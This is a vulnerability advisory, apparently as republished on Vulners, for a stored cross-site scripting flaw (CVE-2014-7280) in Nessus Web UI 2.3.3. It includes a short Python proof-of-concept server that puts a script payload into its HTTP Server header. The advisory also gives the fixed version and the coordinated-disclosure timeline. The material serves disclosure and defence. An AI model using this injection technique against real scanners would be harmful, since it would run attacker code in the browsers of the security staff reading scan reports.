Vulners
Lucene search
Nessus Web UI 2.3.3 - Stored XSS
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Nessus Web UI 2.3.3 Cross Site Scripting Vulnerability | 9 Oct 201400:00 | – | zdt |
 | CVE-2014-7280 | 9 Oct 201400:00 | – | circl |
 | CVE-2014-7280 | 21 Oct 201415:00 | – | cve |
 | CVE-2014-7280 | 21 Oct 201415:00 | – | cvelist |
 | Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting | 9 Oct 201400:00 | – | exploitdb |
 | Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting | 9 Oct 201400:00 | – | exploitpack |
 | Nessus Web UI Scanned Content Stored XSS | 25 Feb 201600:00 | – | nessus |
 | CVE-2014-7280 | 21 Oct 201415:55 | – | nvd |
 | Nessus Web UI 2.3.3 Cross Site Scripting | 7 Oct 201400:00 | – | packetstorm |
 | Cross site scripting | 21 Oct 201415:55 | – | prion |
10
Nessus Web UI 2.3.3: Stored XSS
=========================================================
CVE number: CVE-2014-7280
Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
Vendor advisory: http://www.tenable.com/security/tns-2014-08
-- Info --
Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide.
-- Affected version -
Web UI version 2.3.3, Build #83
-- Vulnerability details --
By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute javascript code on the machine of the person performing a vulnerability scan of the web server. No escaping on javascript code is being performed when passing the server header to the affected Web UI version via a plugin.
The javascript code will be stored in the backend database, and will execute every time the target views a report that returns the server header.
-- POC --
#!/usr/bin/env python
import sys
from twisted.web import server, resource
from twisted.internet import reactor
from twisted.python import log
class Site(server.Site):
def getResourceFor(self, request):
request.setHeader('server', '<script>alert(1)</script>SomeServer')
return server.Site.getResourceFor(self, request)
class HelloResource(resource.Resource):
isLeaf = True
numberRequests = 0
def render_GET(self, request):
self.numberRequests += 1
request.setHeader("content-type", "text/plain")
return "theSecurityFactory Nessus POC"
log.startLogging(sys.stderr)
reactor.listenTCP(8080, Site(HelloResource()))
reactor.run()
-- Solution --
This issue has been fixed as of version 2.3.4 of the WEB UI.
-- Timeline --
2014-06-12 Release of Web UI version 2.3.3, build#83
2014-06-13 Vulnerability discovered and creation of POC
2014-06-13 Vulnerability responsibly reported to vendor
2014-06-13 Vulnerability acknowledged by vendor
2014-06-13 Release of Web UI version 2.3.4, build#85
2014-XX-XX Advisory published in coordination with vendor
-- Credit --
Frank Lycops
Frank.lycops [at] thesecurityfactory.be
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Oct 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.08428